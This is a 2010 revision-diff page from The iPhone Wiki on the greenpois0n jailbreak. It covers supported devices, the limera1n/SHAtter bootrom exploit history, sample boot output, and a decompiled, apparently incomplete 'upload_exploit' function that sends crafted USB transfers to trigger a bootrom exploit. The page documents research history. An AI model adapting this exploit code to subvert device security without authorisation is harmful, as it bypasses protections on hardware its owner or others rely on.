Difference between revisions of "Greenpois0n (jailbreak)"

From The iPhone Wiki
Jump to: navigation, search
(Supported Devices: I like the concept of a table, but it's not needed if all you need to say is it works on 3.2.2 and 4.1.)
Line 24: Line 24:
   
 
=== Supported Devices ===
 
=== Supported Devices ===
  +
greenpois0n requires the device to be on either iOS 3.2.2 ([[K48ap|iPad 1G]]) or iOS 4.1 (all other devices). Of the devices that support these firmware revisions, the only one ''not'' supported is the [[N82ap|iPhone 3G]].
The current version of Greenp0ison (RC4) supports the following iDevices:
 
 
{| class="wikitable" style="font-size: smaller; text-align: center; width: auto; table-layout: fixed; border-collapse: collapse;" border="1"
 
|iDevice
 
|{{iOS 3.2.x - iPad only}}
 
|{{iOS 4.0}}
 
|{{iOS 4.1}}
 
|{{iOS 4.2}}
 
|-
 
|iPhone 2G
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|-
 
|iPhone 3G
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPhone 3Gs new/old bootrom
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPhone 4
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 1G
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 2G MB/MC
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 3G
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPod touch 4G
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|-
 
|iPad 1G Wifi/3G
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|-
 
|ATV2 (Apple TV 2G)
 
|{{no|iOS not supported}}
 
|{{no|iOS not supported}}
 
|{{yes|Yes - Untethered}}
 
|{{no|iOS not supported}}
 
|}
 
   
 
=== Output ===
 
=== Output ===

Revision as of 03:37, 26 October 2010

Gp.png

Greenpois0n is both a cross-platform hacker toolkit (that helps users to find their own exploits for jailbreaks, write custom ramdisks, and create custom firmwares) as well as a jailbreak tool for iDevices written by Chronic Dev (team).

Current Toolset

History

Greenpois0n was originally written using two exploits: SHAtter (a bootrom exploit) as well as a userland exploit provided by Comex to make the jailbreak untethered. A release date of 10/10/10 10:10:10 AM (GMT) was announced, as well as the list of supported devices. Due to the nature of SHAtter, only iDevices using the A4 Processor were supported. geohot later released another jailbreak (limera1n using a different bootrom exploit) on 9 October 2010, which led to a delay in greenpois0n's release (to implement geohot's exploit, not SHAtter).

Controversy

There was much controversy surrounding the sudden release of limera1n and the motives behind it. The main reasons for the limera1n release were:

  1. Use an exploit that Apple already knew about (newer iBoots shows the exploit patched)
  2. Supports more iDevices than SHAtter
  3. Hopefully save the SHAtter bootrom exploit for future iDevices

The reason for this is bootrom exploits are not patchable with software updates. It requires new hardware to fix the security hole. Since the limera1n hole was already discovered and patched by Apple, it benefits the community if SHAtter is saved in hopes of using it with new hardware, like the 5th generation iPhone/iPod touch and the iPad 2G.

Supported Devices

greenpois0n requires the device to be on either iOS 3.2.2 (iPad 1G) or iOS 4.1 (all other devices). Of the devices that support these firmware revisions, the only one not supported is the iPhone 3G.

Output

iPhone 4 with greenpois0n output (via irecovery):

Attempting to initialize greenpois0n
Initializing commands
Searching for cmd_ramdisk
Found cmd_ramdisk string at 0x8401c7ac
Found cmd_ramdisk reference at 0x84000d64
Found cmd_ramdisk function at 0x84000cd1
Initializing patches
Initializing memory
Initializing aes
Searching for aes_crypto_cmd
Found aes_crypto_cmd string at 0x84021a8c
Found aes_crypto_cmd reference at 0x84017bb8
Found aes_crypto_cmd fnction at 0x84017b51
Initializing bdev
Initializing image
Initializing nvram
Initializing kernel
Greenpois0n initialized

Decompiled Exploit Code

Apocolipse has provided a decompiled version of the exploit function (note. it is incomplete, x86 decompilers can only do so much)

 signed int __cdecl upload_exploit()
 {
   int v0; // eax@1
   signed int v1; // edx@2
   int v2; // ebx@2
   int v3; // eax@4
   char *v4; // eax@5
   unsigned int v5; // ebx@8
   int v6; // ecx@14
   signed int result; // eax@15
   signed int v8; // ST38_4@18
   int v9; // eax@28
   signed int v10; // [sp+38h] [bp-1030h]@4
   signed int v11; // [sp+3Ch] [bp-102Ch]@2
   char v12; // [sp+4Ch] [bp-101Ch]@3
   char v13; // [sp+84Ch] [bp-81Ch]@5
   int v14; // [sp+104Ch] [bp-1Ch]@1
   v14 = *MK_FP(__GS__, 20);
   v0 = *(_DWORD *)(device + 16);
   if ( v0 == 8930 )
   {
     v11 = 174080;
     v1 = -2080198655;
     v2 = -2080129124;
   }
   else
   {
     v1 = -2080231423;
     v11 = 141312;
     v2 = (((v0 == 8920) - 1) & 0xFFFFFFF4) - 2080161884;
   }
   memset(&v12, 0, 0x800u);
   memcpy(&v12, exploit, 0x230u);
   if ( libpois0n_debug )
   {
     v8 = v1;
     ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, "Resetting device counters\n");
     v1 = v8;
   }
   v10 = v1;
   v3 = irecv_reset_counters(client);
   if ( v3 )
   {
     irecv_strerror(v3);
     __fprintf_chk(stderr, 1, &aCannotFindS[12]);
     result = -1;
   }
   else
   {
     memset(&v13, -858993460, 0x800u);
     v4 = &v13;
     do
     {
       *(_DWORD *)v4 = 1029;
       *((_DWORD *)v4 + 1) = 257;
       *((_DWORD *)v4 + 2) = v10;
       *((_DWORD *)v4 + 3) = v2;
       v4 += 64;
     }
     while ( (int *)v4 != &v14 );
     if ( libpois0n_debug )
       ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, "Sending chunk headers\n");
     v5 = 0;
     irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
     memset(&v13, -858993460, 0x800u);
     do
     {
       v5 += 2048;
       irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
     }
     while ( v5 < v11 );
     if ( libpois0n_debug )
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending exploit payload\n");
     irecv_control_transfer(client, 33, 1, 0, 0, &v12, 2048);
     if ( libpois0n_debug )
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending fake data\n");
     memset(&v13, -1145324613, 0x800u);
     irecv_control_transfer(client, 161, 1, 0, 0, &v13, 2048);
     irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
     if ( libpois0n_debug )
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Executing exploit\n");
     irecv_control_transfer(client, 33, 2, 0, 0, &v13, 0);
     irecv_reset(client);
     irecv_finish_transfer(client);
     if ( libpois0n_debug )
     {
       ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Exploit sent\n");
       if ( libpois0n_debug )
         ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Reconnecting to device\n");
     }
     client = (void *)irecv_reconnect(client, 2u);
     if ( client )
     {
       result = 0;
     }
     else
     {
       if ( libpois0n_debug )
       {
         v9 = irecv_strerror(0);
         __fprintf_chk(stderr, 1, &aCannotFindS[12], v9);
       }
       __fprintf_chk(stderr, 1, "Unable to reconnect\n");
       result = -1;
     }
   }
   if ( *MK_FP(__GS__, 20) != v14 )
     __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
   return result;
 }